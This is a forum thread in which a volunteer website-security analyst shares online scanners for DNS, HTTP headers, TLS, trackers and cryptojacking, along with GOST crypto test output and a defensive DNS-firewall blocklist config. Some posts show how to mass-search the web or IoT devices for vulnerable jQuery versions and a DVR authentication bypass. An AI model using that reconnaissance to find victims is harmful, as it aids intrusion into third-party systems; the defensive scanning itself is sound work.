Another tool for web admins in this line: http://www.subnet-calculator.com/cidr.php
and for dns: https://www.dnscolos.com/dnsreport.php


Enjoy, my good friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2018, 02:55:25 PM
More on the dig web interface -

Quote
h@8.8.4.4 (Default):
Usage:  dig [@global-server] [domain] [q-type] [q-class] {q-opt}
            {global-d-opt} host [@local-server] {local-d-opt}
            [ host [@local-server] {local-d-opt} [...]]
Where:  domain     is in the Domain Name System
        q-class  is one of (in,hs,ch,...) [default: in]
        q-type   is one of (a,any,mx,ns,soa,hinfo,axfr,txt,...) [default:a]
                 (Use ixfr=version for type ixfr)
        q-opt    is one of:
                 -x dot-notation     (shortcut for reverse lookups)
                 -i                  (use IP6.INT for IPv6 reverse lookups)
                 -f filename         (batch mode)
                 -b address[#port]   (bind to source address/port)
                 -p port             (specify port number)
                 -q name             (specify query name)
                 -t type             (specify query type)
                 -c class            (specify query class)
                 -k keyfile          (specify tsig key file)
                 -y [hmac:]name:key  (specify named base64 tsig key)
                 -4                  (use IPv4 query transport only)
                 -6                  (use IPv6 query transport only)
                 -m                  (enable memory usage debugging)
        d-opt    is of the form +keyword[=value], where keyword is:
                 +[no]vc             (TCP mode)
                 +[no]tcp            (TCP mode, alternate syntax)
                 +time=###           (Set query timeout) [5]
                 +tries=###          (Set number of UDP attempts) [3]
                 +retry=###          (Set number of UDP retries) [2]
                 +domain=###         (Set default domainname)
                 +bufsize=###        (Set EDNS0 Max UDP packet size)
                 +ndots=###          (Set NDOTS value)
                 +edns=###           (Set EDNS version)
                 +[no]search         (Set whether to use searchlist)
                 +[no]showsearch     (Search with intermediate results)
                 +[no]defname        (Ditto)
                 +[no]recurse        (Recursive mode)
                 +[no]ignore         (Don't revert to TCP for TC responses.)
                 +[no]fail           (Don't try next server on SERVFAIL)
                 +[no]besteffort     (Try to parse even illegal messages)
                 +[no]aaonly         (Set AA flag in query (+[no]aaflag))
                 +[no]adflag         (Set AD flag in query)
                 +[no]cdflag         (Set CD flag in query)
                 +[no]cl             (Control display of class in records)
                 +[no]cmd            (Control display of command line)
                 +[no]comments       (Control display of comment lines)
                 +[no]question       (Control display of question)
                 +[no]answer         (Control display of answer)
                 +[no]authority      (Control display of authority)
                 +[no]additional     (Control display of additional)
                 +[no]stats          (Control display of statistics)
                 +[no]short          (Disable everything except short
                                      form of answer)
                 +[no]ttlid          (Control display of ttls in records)
                 +[no]all            (Set or clear all display flags)
                 +[no]qr             (Print question before sending)
                 +[no]nssearch       (Search all authoritative nameservers)
                 +[no]identify       (ID responders in short answers)
                 +[no]trace          (Trace delegation down from root)
                 +[no]dnssec         (Request DNSSEC records)
                 +[no]nsid           (Request Name Server ID)
                 +[no]sigchase       (Chase DNSSEC signatures)
                 +trusted-key=####   (Trusted Key when chasing DNSSEC sigs)
                 +[no]topdown        (Do DNSSEC validation top down mode)
                 +[no]multiline      (Print records in an expanded format)
                 +[no]onesoa         (AXFR prints only one soa record)
        global d-opts and servers (before host name) affect all queries.
        local d-opts and servers (after host name) affect only that lookup.
        -h                           (print help and exit)
        -v                           (print version and exit)
Example output:
Quote
nimbus.bitdefender.net@8.8.4.4 (Default):
nimbus.bitdefender.net.   21599   IN   CNAME   elb-nvi-amz.nimbus.bitdefender.net.
elb-nvi-amz.nimbus.bitdefender.net. 21599 IN CNAME kube-nimbus-1671728955.us-east-1.elb.amazonaws.com.
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.204.39.25
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.203.98.12
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.203.77.162
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.205.81.93
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.45.231.34
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.45.221.142
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.44.27.79
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.21.175.100

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2018, 08:56:44 PM
Just some further additional sources: https://www.crunchbase.com/organization/securolytics#section-overview

Scam scanning sites: http://www.scamfoo.com/  &   https://www.islegitsite.com/check

So many ways to establish what a website is all about without actually clicking that website link

polonus (volunteer website security analyzer and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2018, 11:05:21 PM
For developer's best practices and for debuggers alike, all your cheat sheets together online:

Re: http://overapi.com/                                       A pity you are not allowed to use it, when doing exams.

Also available as an extension: https://chrome.google.com/webstore/detail/all-cheat-sheets/oedodeocfdeegliepeeoieemhdgoijod

For those into websecurity and error-hunting: https://infosec.mozilla.org/guidelines/web_security.html

Enjoy, my good friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on June 03, 2018, 07:26:17 PM
Net Neutrality Monitor - Monitor and analysis in real-time of the censorship systems used by Internet Service Providers.

Test your ISP for net neutrality: example: http://www.neumon.org/ip/206.165.6.11.html

polonus
Title: Re: Tests and other Media topics
Post by: REDACTED on June 09, 2018, 02:40:38 PM
HTTP Header check: https://hackertarget.com/http-header-check/
another way using their api: http://api.hackertarget.com/httpheaders/?q=http://www.google.com

See: https://adresults.nl/tools/header-checker/  &  https://headers.cloxy.net/
Re: http://www.internetmarketingninjas.com/header-checker/

Read: https://www.keycdn.com/blog/http-security-headers/  -> check: https://tools.keycdn.com/curl

polonus

Hello Polonus, I have tried the link that you shared here to check my http header for https://smartdigital.id/jasa-seo/ but it shows the message "unable to connect to HTTP port" and still takes more time to process than webconfs, which I usually use.
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2018, 01:39:51 PM
A nice website and webserver scanner for a "quick and dirty" scan,
see results: https://www.htbridge.com/ -> https://www.htbridge.com/websec/

Can be combined with results of this scanner: https://sonarwhal.com/scanner/
and other specific scanners like for instance https://privacyscore.org/ &  https://urlscan.io/domain
Other aspects can be scanned as well, like jQuery library vulnerability at retire.insecurity.today/#
and dom based issues like sources and sinks via: http://www.domxssscanner.com/  (a Google provided service).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2018, 02:02:23 PM
This could also help you to find initializer errors in scripts like error: Undefined variable storage, where storage had been changed to ::Storage and then in the controller to Storage.put_object_url(...), so as to no longer get an error like
Quote
found JavaScript
     error: undefined function storage._each
     error: undefined variable storage
for ci.psdev.de/static/61489873/scripts/behavior.js  (info credits amonetti on Github's).

Other related scans: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fpsdev.de
re: https://urlscan.io/result/0f751ff0-71e9-4649-ab52-54e567d86693

All coming from the scan results at: https://www.htbridge.com/websec/ for related https://retire.insecurity.today/#!/scan/7149f4aa52e5c1e085e865b9b15c34cf6da783c323b3b17f1da65f9b9f4e7d50

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 26, 2018, 10:09:34 PM
EFF starts new project STARTTLS Everywhere to enhance e-mail security:
Example:
https://starttls-everywhere.org/results/?xs4all.nl

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 03, 2018, 06:07:22 PM
L.S.

When the configuration of STARTTLS is OK, with the right policy list,
and all your hops secured, it is time for automatically enabling HTTPS on your website,
through the use of EFF's Certbot, go here: https://certbot.eff.org/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 04, 2018, 06:35:27 PM
Idiot proof implementation of HTTPS: https://httpsiseasy.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 05, 2018, 05:44:07 PM
Non-malicious site fails SSLScan. See: https://www.htbridge.com/ssl/?id=JcZI3CnC
Compare to: https://observatory.mozilla.org/analyze/www.overgang.no
Also consider: https://dnssec-analyzer.verisignlabs.com/www.overgang.no
Also see: https://sonarwhal.com/scanner/6b727529-dc3f-4687-9596-08107898f6a1

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 10, 2018, 01:14:08 PM
Cryptojacking test for your browser: https://cryptojackingtest.com/

Cryptojacking test for your website: https://notmining.org/

Example of the second scanner for https://notmining.org/url?busqueda=http%3A%2F%2Fmejortorrent.com
Quote
Last update was on: Tue Jul 10 13:13:11 CEST 2018 . The result of this analyse was: Mining.
Detected: CoinHive.Anonymous (coinhive.com)

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 11, 2018, 03:46:46 PM
Online Interactive JavaScript Cheat Sheet for developer and debugger alike:
https://htmlcheatsheet.com/js/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2018, 12:45:48 PM
How are results like those in this Cryptojacking campaign report being searched for?

Example: https://pastebin.com/gYkbVP8b  (some blockers block this link, link for researchers only, temporarily unblock in this case).

This is the searchengine they use: https://publicwww.com

Consider this: https://publicwww.com/websites/cryptojacking+/

And one finds further insights like these: https://www.csoonline.com/search?query=cryptojacking+websites&contentType=article%2Cresource

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2018, 01:56:11 PM
Coming from here: https://www.htbridge.com/websec/?id=Cpy7Tv2c
We stumbled upon: -http://www.baberesto.com/jquery/jquery-1.8.3.min.js

Quote
Attackers often hide backdoors, crypto jacking malware and other malicious code inside of legitimate third-party JS (various libraries and frameworks). We check if a particular version of the third-party JS code was altered with a new code, and report any anomalies here.
The JS seems to match the original code.
The following JS component were found inside:- jQuery [1.8.3]
Then we scanned - https://retire.insecurity.today/#!/scan/641317ed91f88ae93e9067610c473dfcd9e2d68cf1aa721f4c47884ec7e9a1be

And then did a query with "" here: https://publicwww.com/websites/%22%2Fjquery%2Fjquery-1.8.3.min.js%22/
coming up with potentially 18774 websites in 5.14 s, with this medium severity vulnerability:

Quote
Detected libraries:
jquery - 1.8.3 : (active1) hxtp://www.baberesto.com/jquery/jquery-1.8.3.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
https://bugs.jquery.com/ticket/11974
http://research.insecurelabs.org/jquery/test/
(active) - the library was also found to be active by running code
1 vulnerable library detected

error(s) inside this javascript code:
Quote
wXw.baberesto.com/jquery/jquery-1.8.3.min.js
     status: (referer=http:/XXX/web?q=puppies)saved 93636 bytes 06e872300088b9ba8a08427d28ed0efcdf9c6ff5
     info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
     info: [decodingLevel=0] found JavaScript
     error: undefined function p.getElementsByTagName
     error: undefined variable p
     info: [element] URL=wXw.baberesto.com/jquery/undefined
     info: [1] no JavaScript
     file: 06e872300088b9ba8a08427d28ed0efcdf9c6ff5: 93636 bytes
     file: d5dba94a76a67a54f2b98b16227da20414542fd9: 72 bytes
-> leading to wXw.baberesto.com/jquery/undefined

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2018, 05:47:20 PM
An IoT cyberspace search engine to use next to Shodan: https://www.zoomeye.org/searchResult?q=%2Fjquery-1.9.1.min.js

Read: https://twitter.com/ankit_anubhav/status/1017426076467855360 because of
https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117


polonus

Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2018, 12:18:03 AM
Testing websites for tracking.

Check websites for tracking here (example): https://whotracks.me/trackers/snigelweb.html

and compare with a scan at (same example): https://privacyscore.org/site/111090/
ANALYZED URL AFTER LOADING:
-http://www.snigelweb.com/   site is using 17 known tracking- or advertising companies.
Vulnerable to the SWEET32 attack.

ANALYZED MAIL SERVER:
-aspmx.l.google.com


polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2018, 12:40:51 PM
Tracking is hot and there is almost no avoiding it. So you'd better know who's tracking you out of your sock(et)s  ;)

See this one, a site that I would block for malicious ad-redirecting.

Explore the data on this page: https://whotracks.me/websites/bulbagarden.net.html

Now compare with this Tracker Tracker report :
Quote
host   distinct names   name frequencies
-https://sb.scorecardresearch.com/beacon.js   1   ScoreCard Research Beacon (1)
1   ADTECH (1)
-https://bulbapedia.bulbagarden.net   8   OpenX (1) DoubleClick (3) ScoreCard Research Beacon (1) Google Tag Manager (1) Google Analytics (2) Twitter Button (1) ZergNet (1) Econda (1)
-https://Q1MediaHydraPlatform·com/ads/video/controller·php?qid=57d6d4bcdbcb6cda37200d1d&qz=1   1   (1)
-https://forums.bulbagarden.net/js/apantic/profilepostlimit/profile_post_limit.min.js?_v=3b17caa1   1   (1)

We tracked using these URLs
Quote
-https://Q1MediaHydraPlatform·com/ads/video/controller·php?qid=57d6d4bcdbcb6cda37200d1d&qz=1
-https://sb.scorecardresearch.com/beacon.js
-http://adserver.adtechus.com/addyn/3.0/5259.1/2787268/0/277/ADTECH;apid=1A8b2d8494-89ab-11e8-b592-d89d671a1f74;cfp=1;rndc=1531823050;loc=100;target=_blank;key=key1+key2+key3+key4;grp=405;misc=1531823049959
-https://bulbapedia.bulbagarden.net
-https://forums.bulbagarden.net/js/apantic/profilepostlimit/profile_post_limit.min.js?_v=3b17caa1

But there are more links: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=bulbagarden.net&ref_sel=GSP2&ua_sel=ff&fs=1

No specifics alerted here: http://isithacked.com/check/http%3A%2F%2Fbulbagarden.net%2F

polonus



Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2018, 04:02:36 PM
Results may differ: 17 trackers in one report, 18 trackers found in the second:
https://whotracks.me/websites/tripadvisor.de.html   versus    https://privacyscore.org/site/42802/

Also see here: https://trackography.org/
For instance, data in the Netherlands go to comScore from public TV -> -b.scorecardresearch.com (from nos.nl)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2018, 09:05:41 PM
Nice Google JavaScript online compiler service:
https://closure-compiler.appspot.com/home

Repository of such tools: https://mvnrepository.com/artifact/com.google.javascript/closure-compiler

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 19, 2018, 12:02:25 PM
Is your website ready for the latest technology or rather ready for the "Hall of Shame"?

Checking a Hall of Shame site.

New checksite: https://en.internet.nl/site/phenoelit.org/338066/

Compare with existing website testing sites, like:
https://securityheaders.com/?q=http%3A%2F%2Fphenoelit.org%2F
and https://www.htbridge.com/websec/?id=DnFHnhuc
and https://observatory.mozilla.org/analyze/phenoelit.org

Enjoy, my good friends, enjoy,

polonus (volunteer third party cold reconnaissance website security analyst and website error-hunter)

P.S. I do not advise regular users to go here: -http://seurat.0xffffffff.net/  (developer and network hacking),
but with the right mind-set and being into security, one could learn a lot about the insecurity of protocols
(white hat relevant knowledge; ignore the other, darker material out there)

Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 19, 2018, 06:16:37 PM
Are you or your devices not on Shodan?

Scan for it here: https://iotscanner.bullguard.com/

Enjoy, I was not on Shodan and secure via the deepscan results. How about you?
Title: Re: Tests and other Media topics
Post by: polonus on July 23, 2018, 11:59:13 AM
Testing with a JavaScript Tester online /*! JsRender v1.0.0-beta: http://github.com/BorisMoore/jsrender and http://jsviews.com/jsviews
informal pre V1.0 commit counter: 63 */
Possible strict violation - Assignment in conditional expression - Confusing use of '!' - 't' is already defined - A constructor name should start with an uppercase letter - 'g' is already defined - 'd' is already defined - The function constructor is a form of eval - use '!==' to compare with 'null'.

Unpacker does not find errors
Quote
nothing detected] script
     info: [decodingLevel=0] found JavaScript
     file: d3d7bb9a49ca44016a34a26956f1bfeacc4de695: 16068 bytes

Read here in this respect: http://mahalingamganesan.weebly.com/security.html
Re: http://www.webtoolkitonline.com/javascript-tester.html  Test in http://jsbin.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 02, 2018, 12:40:17 AM
Check your secure connection DNSSEC & DS algorithm
at https://rootcanary.org/test.html

enjoy my good friends, enjoy

polonus

Somehow GOST WebCrypto is not validated by my resolver(s) - Pure Javascript implementation of WebCrypto API interfaces and Public Key Infrastructure for GOST algorithms (Russian Cryptographic Standards) - read: https://github.com/rudonick/crypto
Demo: http://gostcrypto.com/

When trying to test GOST I was held back by a MalwareBytes Browser Extension Beta alert: Website blocked due
to possible suspicious activity

We strongly recommend you do not visit this site.

Website blocked: htXp://gostcrypto.com/self-tests.html

Damian
Title: Re: Tests and other Media topics
Post by: polonus on August 02, 2018, 01:07:36 AM
Tested it in a decentralized browser, Beaker browser beta, and there it worked like a charm; results below:

Quote
GOST R 34.11-94 TEST

Test 01 GOST R 34.11-94-256 ........................................ PASSED 0.024 sec
Test 02 GOST R 34.11-94-256 ........................................ PASSED 0.007 sec
Test 03 GOST R 34.11-94-256 ........................................ PASSED 0.018 sec
Test 04 GOST R 34.11-94-256 ........................................ PASSED 0.032 sec
 
Test 05 GOST R 34.11-94-256/D-TEST ................................. PASSED 0.003 sec
Test 06 GOST R 34.11-94-256/D-TEST ................................. PASSED 0.002 sec
Test 07 GOST R 34.11-94-256/D-TEST ................................. PASSED 0.002 sec
Test 08 GOST R 34.11-94-256/D-TEST ................................. PASSED 0.003 sec
 
PBKDF2 tests
Test 09 GOST R 34.11-94-256-PBKDF2 ................................. PASSED 0.069 sec
Test 10 GOST R 34.11-94-256-PBKDF2 ................................. PASSED 0.026 sec
Test 11 GOST R 34.11-94-256-PBKDF2 ................................. PASSED 1.527 sec
 
TOTAL OK
 
GOST R 34.11-2012 TEST

Test 01 GOST R 34.10-12-256 ........................................ PASSED 0.01 sec
Test 02 GOST R 34.10-12-256 ........................................ PASSED 0.026 sec
Test 03 GOST R 34.10-12-256 ........................................ PASSED 0 sec
Test 04 GOST R 34.10-12-256 ........................................ PASSED 0 sec
 
Test 05 GOST R 34.11-12-256-KDF .................................... PASSED 0.013 sec
Test 06 GOST R 34.11-12-256-KDF .................................... PASSED 0.005 sec
 
HMAC/PBKDF2 tests
Test 07 GOST R 34.11-12-256-HMAC ................................... PASSED 0.001 sec
Test 08 GOST R 34.11-12-512-HMAC ................................... PASSED 0.001 sec
Test 09 GOST R 34.11-12-256-PBKDF2 ................................. PASSED 0.476 sec
Test 10 GOST R 34.11-12-512-PBKDF2/VN .............................. PASSED 0.029 sec
Test 11 GOST R 34.11-12-512-PBKDF2/VN .............................. PASSED 0.026 sec
 
Test 12 GOST R 34.11-12-512 ........................................ PASSED 0 sec
Test 13 GOST R 34.11-12-512 ........................................ PASSED 0 sec
Test 14 GOST R 34.11-12-512 ........................................ PASSED 0 sec
Test 15 GOST R 34.11-12-512 ........................................ PASSED 0.004 sec
 
TOTAL OK
 
SHA-1 TEST

Test 01 SHA-1 ...................................................... PASSED 0.007 sec
Test 02 SHA-1 ...................................................... PASSED 0.001 sec
Test 03 SHA-1 ...................................................... PASSED 0.008 sec
 
PBKDF2 tests
Test 04 SHA-1-PBKDF2 ............................................... PASSED 0.001 sec
Test 05 SHA-1-PBKDF2 ............................................... PASSED 0.004 sec
Test 06 SHA-1-PFXKDF ............................................... PASSED 0.004 sec
Test 07 SHA-1-PFXKDF ............................................... PASSED 0.029 sec
Test 08 SHA-1-PFXKDF ............................................... PASSED 0.003 sec
Test 09 SHA-1-PFXKDF ............................................... PASSED 0.106 sec
 
TOTAL OK
 
GOST R 34.10-94 TEST

Test 01 GOST R 34.10-94-256/S-TEST ................................. PASSED Sign 0.072 sec, Verify 0.036 sec
 
TOTAL OK
 
GOST R 34.10-2012 TEST

Test 01 GOST R 34.10-12-256/S-256-TEST ............................. PASSED Sign 0.237 sec, Verify 0.118 sec
Test 02 GOST R 34.10-12-256/T-512-TEST ............................. PASSED Sign 0.566 sec, Verify 0.408 sec
Test 03 GOST R 34.10-12-256/S-256-TEST ............................. PASSED Sign 0.056 sec, Verify 0.141 sec
Test 04 GOST R 34.10-12-256/S-256-TEST ............................. PASSED Sign 0.035 sec, Verify 0.063 sec
Test 05 GOST R 34.10-12-256/S-256-TEST ............................. PASSED Sign 0.079 sec, Verify 0.279 sec
Test 06 GOST R 34.10-12-256/T-512-TEST ............................. PASSED Sign 0.235 sec, Verify 0.297 sec
 
Key exchange scenario
Test 07 GOST R 34.10-12-256-DH/S-256-TEST .......................... PASSED DeriveKey 0.067 sec
Test 08 GOST R 34.10-12-256-DH/X-256-A ............................. PASSED DeriveKey 0.05 sec
Test 09 GOST R 34.10-12-256-DH/X-256-A ............................. PASSED DeriveKey 0.047 sec
 
TOTAL OK
 
GOST 28147-89/GOST R 34.12-2015 TEST

Test 01 GOST 28147-ECB/D-TEST ...................................... PASSED
Test 02 GOST 28147-CBC/D-TEST ...................................... PASSED
Test 03 GOST 28147-CTR/D-TEST ...................................... PASSED
Test 04 GOST 28147-CFB/D-TEST ...................................... PASSED
Test 05 GOST 28147-ECB/D-TEST ...................................... PASSED
Test 06 GOST 28147-CFB/D-TEST ...................................... PASSED
Test 07 GOST 28147-CFB/E-TEST ...................................... PASSED
Test 08 GOST 28147-CFB/E-A ......................................... PASSED
Test 09 GOST 28147-CFB-8/E-B ....................................... PASSED
Test 10 GOST 28147-CFB-8/E-C ....................................... PASSED
Test 11 GOST 28147-CFB-8/E-D ....................................... PASSED
Test 12 GOST 28147-CFB-8/D-A ....................................... PASSED
Test 13 GOST 28147-CFB-8 ........................................... PASSED
Test 14 GOST 28147-CTR/E-A ......................................... PASSED
Test 15 GOST 28147-ECB/E-Z ......................................... PASSED
 
MAC sing/verify
Test 16 GOST 28147-MAC-32/E-A ...................................... PASSED
Test 17 GOST 28147-MAC-32/E-A ...................................... PASSED
 
Padding
Test 18 GOST 28147-ECB-BITPADDING/D-TEST ........................... PASSED
Test 19 GOST 28147-ECB-BITPADDING/D-TEST ........................... PASSED
Test 20 GOST 28147-ECB-PKCS5PPADDING/D-TEST ........................ PASSED
Test 21 GOST 28147-ECB-PKCS5PPADDING/D-TEST ........................ PASSED
Test 22 GOST 28147-ECB-ZEROPADDING/D-TEST .......................... PASSED
 
Key meshing
Test 23 GOST 28147-CFB-CPKEYMESHING/E-A ............................ PASSED
Test 24 GOST 28147-CBC-CPKEYMESHING/E-A ............................ PASSED
Test 25 GOST 28147-CTR-CPKEYMESHING/E-A ............................ PASSED
Test 26 GOST 28147-MAC-32/E-A ...................................... PASSED
 
Key wrapping
Test 27 GOST 28147-KW/D-TEST ....................................... PASSED
Test 28 GOST 28147-KW/E-A .......................................... PASSED
Test 29 GOST 28147-CPKW/D-TEST ..................................... PASSED
Test 30 GOST 28147-CPKW/E-A ........................................ PASSED
Test 31 GOST 28147-SCKW/E-SC ....................................... PASSED
 
GOST R 34.12-2015/64bits
Test 32 GOST R 34.12-15-ECB ........................................ PASSED
Test 33 GOST R 34.12-15-ECB ........................................ PASSED
Test 34 GOST R 34.12-15-CTR ........................................ PASSED
Test 35 GOST R 34.12-15-CBC ........................................ PASSED
Test 36 GOST R 34.12-15-CFB ........................................ PASSED
Test 37 GOST R 34.12-15-OFB ........................................ PASSED
Test 38 GOST R 34.12-15-MAC-32 ..................................... PASSED
 
GOST R 34.12-2015/128bits
Test 39 GOST R 34.12-15-128-ECB .................................... PASSED
Test 40 GOST R 34.12-15-128-ECB .................................... PASSED
Test 41 GOST R 34.12-15-128-CTR .................................... PASSED
Test 42 GOST R 34.12-15-128-OFB .................................... PASSED
Test 43 GOST R 34.12-15-128-CBC .................................... PASSED
Test 44 GOST R 34.12-15-128-CFB .................................... PASSED
Test 45 GOST R 34.12-15-128-MAC-64 ................................. PASSED
 
RC2
Test 46 RC2-63-ECB ................................................. PASSED
Test 47 RC2-ECB .................................................... PASSED
Test 48 RC2-ECB .................................................... PASSED
Test 49 RC2-ECB .................................................... PASSED
Test 50 RC2-ECB .................................................... PASSED
Test 51 RC2-ECB .................................................... PASSED
Test 52 RC2-128-ECB ................................................ PASSED
Test 53 RC2-129-ECB ................................................ PASSED
 
TOTAL OK

I do not understand why it does not work in the mainstream browsers; it should work in Yandex browser,
but I did not test it there. I also do not understand the over-reactive security alert from the MalwareBytes extension  ???


polonus (volunteer 3rd party website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 11, 2018, 12:41:40 PM
Nice collection of various blocklists, all incorporated in the code of this dns-fw:
https://github.com/cbuijs/unbound-dns-firewall/blob/master/dns-firewall.lists

Some you could add to your blocker of sorts.
Quote
////
Default-Regex-Black   black   /etc/unbound/regex-blacklist
Default-Regex-White   white   /etc/unbound/regex-whitelist

##Disconnect-Ads   black   https://s3.amazonaws.com/lists.disconnect.me/simple_ad.txt   /etc/unbound/disconnect-ads.list   86400   @DOMAIN
##Disconnect-Malware   black   https://s3.amazonaws.com/lists.disconnect.me/simple_malware.txt   /etc/unbound/disconnect-malware.list   86400   @DOMAIN
##Disconnect-Tracking   black   https://s3.amazonaws.com/lists.disconnect.me/simple_tracking.txt   /etc/unbound/disconnect-tracking.list   86400   @DOMAIN
##Disconnect-Malvertising   black   https://s3.amazonaws.com/lists.disconnect.me/simple_malvertising.txt   /etc/unbound/disconnect-malvertising.list   86400   @DOMAIN

#Adguard-Android   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/android.txt   /etc/unbound/adguard-android.list   86400   @DOMAIN
#Adguard-Banks   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/banks.txt   /etc/unbound/adguard-banks.list   86400   @DOMAIN
#Adguard-FireFox   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/firefox.txt   /etc/unbound/adguard-firefox.list   86400   @DOMAIN
#Adguard-Issues   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/issues.txt   /etc/unbound/adguard-issues.list   86400   @DOMAIN
#Adguard-Sensistive   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/sensitive.txt   /etc/unbound/adguard-sensitive.list   86400   @DOMAIN

EasyList   black   https://easylist.to/easylist/easylist.txt   /etc/unbound/easylist.list   86400   @ADBLOCK-BLACK
EasyList-Element   black   /etc/unbound/easylist.list.download   /etc/unbound/easylist-element.list   86400   @ADBLOCK-ELEMENT
EasyList-White   white   /etc/unbound/easylist.list.download   /etc/unbound/easylist-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE
EasyPrivacy   black   https://easylist.to/easylist/easyprivacy.txt   /etc/unbound/easyprivacy.list   86400   @ADBLOCK-BLACK
EasyPrivacy-Element   black   /etc/unbound/easyprivacy.list.download   /etc/unbound/easyprivacy-element.list   86400   @ADBLOCK-ELEMENT
EasyPrivacy-White   white   /etc/unbound/easyprivacy.list.download   /etc/unbound/easyprivacy-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE
EasyList-Dutch   black   https://easylist-downloads.adblockplus.org/easylistdutch.txt   /etc/unbound/easylist-dutch.list   86400   @ADBLOCK-BLACK
EasyList-Dutch-Element   black   /etc/unbound/easylist-dutch.list.download   /etc/unbound/easylist-dutch-element.list   86400   @ADBLOCK-ELEMENT
EasyList-Dutch-White   white   /etc/unbound/easylist-dutch.list.download   /etc/unbound/easylist-dutch-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE
EasyList-French   black   https://easylist-downloads.adblockplus.org/liste_fr.txt   /etc/unbound/easylist-french.list   86400   @ADBLOCK-BLACK
EasyList-French-Element   black   /etc/unbound/easylist-french.list.download   /etc/unbound/easylist-french-element.list   86400   @ADBLOCK-ELEMENT
EasyList-French-White   white   /etc/unbound/easylist-french.list.download   /etc/unbound/easylist-french-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE

#FanBoy-Complete   black   https://fanboy.co.nz/r/fanboy-complete.txt   /etc/unbound/fanboy.list   86400   @ADBLOCK-BLACK
#FanBoy-Complete-White   white   /etc/unbound/fanboy.list.download   /etc/unbound/fanboy-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE

#PipeRun   black   https://raw.githubusercontent.com/piperun/iploggerfilter/master/filterlist   /etc/unbound/piperun.list   86400   @ADBLOCK-BLACK

#PopAds   black   https://raw.githubusercontent.com/Yhonay/antipopads/master/popads.txt   /etc/unbound/popads.list   86400   @ADBLOCK-BLACK

#Anudeep   white   https://raw.githubusercontent.com/anudeepND/whitelist/master/whitelist.txt   /etc/unbound/anudeep.list   86400   @DOMAIN
#Anudeep-YouTube-Ads   black   https://raw.githubusercontent.com/anudeepND/youtubeadsblacklist/master/domainlist.txt   /etc/unbound/anudeep-youtube-ads.list   86400   @DOMAIN

#BarbBlock   black   https://ssl.bblck.me/blacklists/domain-list.txt   /etc/unbound/barbblock.list   86400   @DOMAIN

##Adguard-Cryptominers   black   https://raw.githubusercontent.com/AdguardTeam/AdguardFilters/master/EnglishFilter/sections/cryptominers.txt   /etc/unbound/adguard-cryptominers.list   86400   @ADBLOCK-BLACK
##CoinBlocker   black   https://raw.githubusercontent.com/ZeroDot1/CoinBlockerLists/master/list.txt   /etc/unbound/coinblocker.list   86400   @DOMAIN
##CoinBlocker-IP   black   https://raw.githubusercontent.com/ZeroDot1/CoinBlockerLists/master/MiningServerIPList.txt   /etc/unbound/coinblocker-ip.list   86400   @IP
##NoCoin   black   https://raw.githubusercontent.com/hoshsadiq/adblock-nocoin-list/master/hosts.txt   /etc/unbound/nocoin.list   86400   @HOST0

##Dshield-Top10   black   http://feeds.dshield.org/top10-2.txt   /etc/unbound/dshield-top10.list   86400   @HOST   ^site$
